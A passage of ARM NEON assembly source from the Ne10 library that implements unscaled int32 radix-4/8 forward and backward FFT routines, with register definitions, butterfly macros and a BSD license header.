* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_int32.neon.s
*/
.text
.syntax unified
/* Registers define*/
/*ARM Registers*/
p_fout .req r0
p_fin .req r1
p_factors .req r2
p_twiddles .req r3
stage_count .req r4
fstride .req r5
mstride .req r6
radix .req r12
p_fin0 .req r7
p_fin1 .req r8
p_fin2 .req r9
p_fin3 .req r10
p_tmp .req r11
count .req r2
fstride1 .req r2
fstep .req r7
p_out_ls .req r14
nstep .req r2
mstep .req r7
count_f .req r8
count_m .req r9
p_tw1 .req r10
p_in1 .req r11
p_out1 .req r12
tmp0 .req r9
/*NEON variale Declaration for the first stage*/
q_in0_01 .qn q0
q_in1_01 .qn q1
q_in2_01 .qn q2
q_in3_01 .qn q3
q_s0_2 .qn q4
q_s1_2 .qn q5
q_s2_2 .qn q6
q_s3_2 .qn q7
d_s1_r2 .dn d10
d_s1_i2 .dn d11
d_s3_r2 .dn d14
d_s3_i2 .dn d15
q_out0_2 .qn q8
q_out1_2 .qn q9
q_out2_2 .qn q10
q_out3_2 .qn q11
d_out1_r15 .dn d18
d_out1_i15 .dn d19
d_out3_r37 .dn d22
d_out3_i37 .dn d23
d_in0_r .dn d0
d_in0_i .dn d1
d_in1_r .dn d2
d_in1_i .dn d3
d_in2_r .dn d4
d_in2_i .dn d5
d_in3_r .dn d6
d_in3_i .dn d7
d_in4_r .dn d8
d_in4_i .dn d9
d_in5_r .dn d10
d_in5_i .dn d11
d_in6_r .dn d12
d_in6_i .dn d13
d_in7_r .dn d14
d_in7_i .dn d15
q_in0 .qn q0
q_in1 .qn q1
q_in2 .qn q2
q_in3 .qn q3
q_in4 .qn q4
q_in5 .qn q5
q_in6 .qn q6
q_in7 .qn q7
q_sin0 .qn q8
q_sin1 .qn q9
q_sin2 .qn q10
q_sin3 .qn q11
q_sin4 .qn q12
q_sin5 .qn q13
q_sin6 .qn q14
q_sin7 .qn q15
d_sin3_r .dn d22
d_sin3_i .dn d23
d_sin5_r .dn d26
d_sin5_i .dn d27
d_sin7_r .dn d30
d_sin7_i .dn d31
d_tw_twn .dn d0
d_s3_r .dn d2
d_s3_i .dn d3
d_s7_r .dn d4
d_s7_i .dn d5
q_s3 .qn q1
q_s7 .qn q2
q_s8 .qn q11
q_s9 .qn q15
q_s10 .qn q3
q_s11 .qn q4
q_s12 .qn q5
q_s13 .qn q6
q_s14 .qn q7
q_s15 .qn q0
q_out0 .qn q1
q_out1 .qn q2
q_out2 .qn q8
q_out3 .qn q9
q_out4 .qn q10
q_out5 .qn q12
q_out6 .qn q13
q_out7 .qn q14
d_s10_r .dn d6
d_s10_i .dn d7
d_s11_r .dn d8
d_s11_i .dn d9
d_s14_r .dn d14
d_s14_i .dn d15
d_s15_r .dn d0
d_s15_i .dn d1
d_out2_r .dn d16
d_out2_i .dn d17
d_out3_r .dn d18
d_out3_i .dn d19
d_out6_r .dn d26
d_out6_i .dn d27
d_out7_r .dn d28
d_out7_i .dn d29
/*NEON variale Declaration for mstride loop */
d_fin0_r .dn d0
d_fin0_i .dn d1
d_fin1_r .dn d2
d_fin1_i .dn d3
d_fin2_r .dn d4
d_fin2_i .dn d5
d_fin3_r .dn d6
d_fin3_i .dn d7
d_tw0_r .dn d8
d_tw0_i .dn d9
d_tw1_r .dn d10
d_tw1_i .dn d11
d_tw2_r .dn d12
d_tw2_i .dn d13
q_fin0 .qn q0
q_fin1 .qn q1
q_fin2 .qn q2
q_fin3 .qn q3
q_scr0 .qn q15
q_scr1_r .qn q7
q_scr1_i .qn q8
q_scr2_r .qn q9
q_scr2_i .qn q10
q_scr3_r .qn q11
q_scr3_i .qn q12
q_scr1 .qn q7
q_scr2 .qn q8
q_scr3 .qn q9
q_scr4 .qn q10
q_scr5 .qn q11
q_scr6 .qn q12
q_scr7 .qn q13
d_scr1_r .dn d14
d_scr1_i .dn d15
d_scr2_r .dn d16
d_scr2_i .dn d17
d_scr3_r .dn d18
d_scr3_i .dn d19
d_scr5_r .dn d22
d_scr5_i .dn d23
d_scr7_r .dn d26
d_scr7_i .dn d27
q_fout0 .qn q7
q_fout2 .qn q8
d_fout0_r .dn d14
d_fout0_i .dn d15
d_fout1_r .dn d28
d_fout1_i .dn d29
d_fout2_r .dn d16
d_fout2_i .dn d17
d_fout3_r .dn d30
d_fout3_i .dn d31
.macro BUTTERFLY4X2_WITHOUT_TWIDDLES scaled_flag, inverse
/* radix 4 butterfly without twiddles */
.ifeqs "\scaled_flag", "TRUE"
/* scaled_flag is true*/
vhadd.s32 q_s0_2, q_in0_01, q_in2_01
vhsub.s32 q_s1_2, q_in0_01, q_in2_01
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vhadd.s32 q_s2_2, q_in1_01, q_in3_01
vhsub.s32 q_s3_2, q_in1_01, q_in3_01
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
vhsub.s32 q_out2_2, q_s0_2, q_s2_2
vhadd.s32 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vhsub.s32 d_out1_r15, d_s1_r2, d_s3_i2
vhadd.s32 d_out1_i15, d_s1_i2, d_s3_r2
vhadd.s32 d_out3_r37, d_s1_r2, d_s3_i2
vhsub.s32 d_out3_i37, d_s1_i2, d_s3_r2
.else
vhadd.s32 d_out1_r15, d_s1_r2, d_s3_i2
vhsub.s32 d_out1_i15, d_s1_i2, d_s3_r2
vhsub.s32 d_out3_r37, d_s1_r2, d_s3_i2
vhadd.s32 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.else
/* scaled_flag is false*/
vadd.s32 q_s0_2, q_in0_01, q_in2_01
vsub.s32 q_s1_2, q_in0_01, q_in2_01
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vadd.s32 q_s2_2, q_in1_01, q_in3_01
vsub.s32 q_s3_2, q_in1_01, q_in3_01
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
vsub.s32 q_out2_2, q_s0_2, q_s2_2
vadd.s32 q_out0_2, q_s0_2, q_s2_2
.ifeqs "\inverse", "TRUE"
vsub.s32 d_out1_r15, d_s1_r2, d_s3_i2
vadd.s32 d_out1_i15, d_s1_i2, d_s3_r2
vadd.s32 d_out3_r37, d_s1_r2, d_s3_i2
vsub.s32 d_out3_i37, d_s1_i2, d_s3_r2
.else
vadd.s32 d_out1_r15, d_s1_r2, d_s3_i2
vsub.s32 d_out1_i15, d_s1_i2, d_s3_r2
vsub.s32 d_out3_r37, d_s1_r2, d_s3_i2
vadd.s32 d_out3_i37, d_s1_i2, d_s3_r2
.endif
.endif
vtrn.32 q_out0_2, q_out1_2
vtrn.32 q_out2_2, q_out3_2
vst2.32 {q_out0_2}, [p_tmp]!
vst2.32 {q_out2_2}, [p_tmp]!
vst2.32 {q_out1_2}, [p_tmp]!
vst2.32 {q_out3_2}, [p_tmp]!
.endm
.macro BUTTERFLY4X2_WITH_TWIDDLES scaled_flag, inverse
sub p_in1, p_in1, nstep, lsl #2
add p_in1, p_in1, #16
sub p_tw1, p_tw1, mstep, lsl #1
add p_tw1, p_tw1, #16
vmov q_scr0, q_fin0
vmull.s32 q_scr1_r, d_fin1_r, d_tw0_r
vmull.s32 q_scr1_i, d_fin1_i, d_tw0_r
vmull.s32 q_scr2_r, d_fin2_r, d_tw1_r
vmull.s32 q_scr2_i, d_fin2_i, d_tw1_r
vmull.s32 q_scr3_r, d_fin3_r, d_tw2_r
vmull.s32 q_scr3_i, d_fin3_i, d_tw2_r
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
.ifeqs "\inverse", "TRUE"
vmlal.s32 q_scr1_r, d_fin1_i, d_tw0_i
vmlsl.s32 q_scr1_i, d_fin1_r, d_tw0_i
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlal.s32 q_scr2_r, d_fin2_i, d_tw1_i
vmlsl.s32 q_scr2_i, d_fin2_r, d_tw1_i
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlal.s32 q_scr3_r, d_fin3_i, d_tw2_i
vmlsl.s32 q_scr3_i, d_fin3_r, d_tw2_i
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.else
vmlsl.s32 q_scr1_r, d_fin1_i, d_tw0_i
vmlal.s32 q_scr1_i, d_fin1_r, d_tw0_i
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vmlsl.s32 q_scr2_r, d_fin2_i, d_tw1_i
vmlal.s32 q_scr2_i, d_fin2_r, d_tw1_i
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vmlsl.s32 q_scr3_r, d_fin3_i, d_tw2_i
vmlal.s32 q_scr3_i, d_fin3_r, d_tw2_i
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
.endif
vrshrn.i64 d_scr1_r, q_scr1_r, #31
vrshrn.i64 d_scr1_i, q_scr1_i, #31
vrshrn.i64 d_scr2_r, q_scr2_r, #31
vrshrn.i64 d_scr2_i, q_scr2_i, #31
vrshrn.i64 d_scr3_r, q_scr3_r, #31
vrshrn.i64 d_scr3_i, q_scr3_i, #31
.ifeqs "\scaled_flag", "TRUE"
vhadd.s32 q_scr4, q_scr0, q_scr2
vhsub.s32 q_scr5, q_scr0, q_scr2
vhadd.s32 q_scr6, q_scr1, q_scr3
vhsub.s32 q_scr7, q_scr1, q_scr3
vhadd.s32 q_fout0, q_scr4, q_scr6
vhsub.s32 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vhsub.s32 d_fout1_r, d_scr5_r, d_scr7_i
vhadd.s32 d_fout1_i, d_scr5_i, d_scr7_r
vhadd.s32 d_fout3_r, d_scr5_r, d_scr7_i
vhsub.s32 d_fout3_i, d_scr5_i, d_scr7_r
.else
vhadd.s32 d_fout1_r, d_scr5_r, d_scr7_i
vhsub.s32 d_fout1_i, d_scr5_i, d_scr7_r
vhsub.s32 d_fout3_r, d_scr5_r, d_scr7_i
vhadd.s32 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.else
vadd.s32 q_scr4, q_scr0, q_scr2
vsub.s32 q_scr5, q_scr0, q_scr2
vadd.s32 q_scr6, q_scr1, q_scr3
vsub.s32 q_scr7, q_scr1, q_scr3
vadd.s32 q_fout0, q_scr4, q_scr6
vsub.s32 q_fout2, q_scr4, q_scr6
.ifeqs "\inverse", "TRUE"
vsub.s32 d_fout1_r, d_scr5_r, d_scr7_i
vadd.s32 d_fout1_i, d_scr5_i, d_scr7_r
vadd.s32 d_fout3_r, d_scr5_r, d_scr7_i
vsub.s32 d_fout3_i, d_scr5_i, d_scr7_r
.else
vadd.s32 d_fout1_r, d_scr5_r, d_scr7_i
vsub.s32 d_fout1_i, d_scr5_i, d_scr7_r
vsub.s32 d_fout3_r, d_scr5_r, d_scr7_i
vadd.s32 d_fout3_i, d_scr5_i, d_scr7_r
.endif
.endif
vst2.32 {d_fout0_r, d_fout0_i}, [p_out1], mstep
vst2.32 {d_fout1_r, d_fout1_i}, [p_out1], mstep
vst2.32 {d_fout2_r, d_fout2_i}, [p_out1], mstep
vst2.32 {d_fout3_r, d_fout3_i}, [p_out1], mstep
sub p_out1, p_out1, mstep, lsl #2
add p_out1, p_out1, #16
.endm
.macro BUTTERFLY8X2_WITHOUT_TWIDDLES scaled_flag, inverse
/**
* q_in0: Fin1[0]
* q_in1: Fin1[0 + fstride]
* q_in2: Fin1[fstride1]
* q_in3: Fin1[fstride1 + fstride]
* q_in4: Fin1[fstride1*2]
* q_in5: Fin1[fstride1*2 + fstride]
* q_in6: Fin1[fstride1*3]
* q_in7: Fin1[fstride1*3 + fstride]
*
*/
adr tmp0, .L_TW_81_32
vld2.32 {d_in0_r, d_in0_i}, [p_in1:64], fstep
vld2.32 {d_in2_r, d_in2_i}, [p_in1:64], fstep
vld2.32 {d_in4_r, d_in4_i}, [p_in1:64], fstep
vld2.32 {d_in6_r, d_in6_i}, [p_in1:64], fstep
vld2.32 {d_in1_r, d_in1_i}, [p_in1:64], fstep
vld2.32 {d_in3_r, d_in3_i}, [p_in1:64], fstep
vld2.32 {d_in5_r, d_in5_i}, [p_in1:64], fstep
vld2.32 {d_in7_r, d_in7_i}, [p_in1:64], fstep
.ifeqs "\scaled_flag", "TRUE"
vshr.s32 q_in0, q_in0, 3
vshr.s32 q_in2, q_in2, 3
vshr.s32 q_in4, q_in4, 3
vshr.s32 q_in6, q_in6, 3
vshr.s32 q_in1, q_in1, 3
vshr.s32 q_in3, q_in3, 3
vshr.s32 q_in5, q_in5, 3
vshr.s32 q_in7, q_in7, 3
.endif
// radix 4 butterfly without twiddles
vadd.s32 q_sin0, q_in0, q_in1
vsub.s32 q_sin1, q_in0, q_in1
vld1.32 {d_tw_twn}, [tmp0]
vadd.s32 q_sin2, q_in2, q_in3
vsub.s32 q_sin3, q_in2, q_in3
vadd.s32 q_sin4, q_in4, q_in5
vsub.s32 q_sin5, q_in4, q_in5
vadd.s32 q_sin6, q_in6, q_in7
vsub.s32 q_sin7, q_in6, q_in7
.ifeqs "\inverse", "TRUE"
vneg.s32 d_sin5_i, d_sin5_i
vsub.s32 d_s3_r, d_sin3_r, d_sin3_i
vadd.s32 d_s3_i, d_sin3_i, d_sin3_r
vadd.s32 d_s7_r, d_sin7_r, d_sin7_i
vsub.s32 d_s7_i, d_sin7_i, d_sin7_r
.else
vneg.s32 d_sin5_r, d_sin5_r
vadd.s32 d_s3_r, d_sin3_r, d_sin3_i
vsub.s32 d_s3_i, d_sin3_i, d_sin3_r
vsub.s32 d_s7_r, d_sin7_r, d_sin7_i
vadd.s32 d_s7_i, d_sin7_i, d_sin7_r
.endif
vswp d_sin5_r, d_sin5_i
vqdmulh.s32 q_s3, q_s3, d_tw_twn[0]
vqdmulh.s32 q_s7, q_s7, d_tw_twn[1]
// radix 2 butterfly
vadd.s32 q_s8, q_sin0, q_sin4
vadd.s32 q_s9, q_sin1, q_sin5
vsub.s32 q_s10, q_sin0, q_sin4
vsub.s32 q_s11, q_sin1, q_sin5
// radix 2 butterfly
vadd.s32 q_s12, q_sin2, q_sin6
vadd.s32 q_s13, q_s3, q_s7
vsub.s32 q_s14, q_sin2, q_sin6
vsub.s32 q_s15, q_s3, q_s7
vsub.s32 q_out4, q_s8, q_s12
vsub.s32 q_out5, q_s9, q_s13
vadd.s32 q_out0, q_s8, q_s12
vadd.s32 q_out1, q_s9, q_s13
.ifeqs "\inverse", "TRUE"
vsub.s32 d_out2_r, d_s10_r, d_s14_i
vadd.s32 d_out2_i, d_s10_i, d_s14_r
vsub.s32 d_out3_r, d_s11_r, d_s15_i
vadd.s32 d_out3_i, d_s11_i, d_s15_r
vadd.s32 d_out6_r, d_s10_r, d_s14_i
vsub.s32 d_out6_i, d_s10_i, d_s14_r
vadd.s32 d_out7_r, d_s11_r, d_s15_i
vsub.s32 d_out7_i, d_s11_i, d_s15_r
.else
vadd.s32 d_out2_r, d_s10_r, d_s14_i
vsub.s32 d_out2_i, d_s10_i, d_s14_r
vadd.s32 d_out3_r, d_s11_r, d_s15_i
vsub.s32 d_out3_i, d_s11_i, d_s15_r
vsub.s32 d_out6_r, d_s10_r, d_s14_i
vadd.s32 d_out6_i, d_s10_i, d_s14_r
vsub.s32 d_out7_r, d_s11_r, d_s15_i
vadd.s32 d_out7_i, d_s11_i, d_s15_r
.endif
vtrn.32 q_out0, q_out1
vtrn.32 q_out2, q_out3
vtrn.32 q_out4, q_out5
vtrn.32 q_out6, q_out7
vst2.32 {q_out0}, [p_out1]!
vst2.32 {q_out2}, [p_out1]!
vst2.32 {q_out4}, [p_out1]!
vst2.32 {q_out6}, [p_out1]!
vst2.32 {q_out1}, [p_out1]!
vst2.32 {q_out3}, [p_out1]!
vst2.32 {q_out5}, [p_out1]!
vst2.32 {q_out7}, [p_out1]!
sub p_in1, p_in1, fstep, lsl #3
add p_in1, p_in1, #16
.endm
.align 4
.L_TW_81_32:
.long 1518500249
.long -1518500249
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_forward_int32_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_forward_int32_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_unscaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_unscaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_unscaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "FALSE", "FALSE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_unscaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_unscaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_unscaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int32_unscaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
.global ne10_mixed_radix_fft_backward_int32_unscaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int32_unscaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_unscaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs count, count, #2
bgt .L_ne10_radix4_butterfly_inverse_unscaled_first_stage_fstride
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "FALSE", "TRUE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_inverse_unscaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_unscaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_unscaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_unscaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_unscaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_unscaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "FALSE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_unscaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_unscaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int32_unscaled_neon */
/**
* @details This function implements a radix-4/8 forwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*/
.align 4
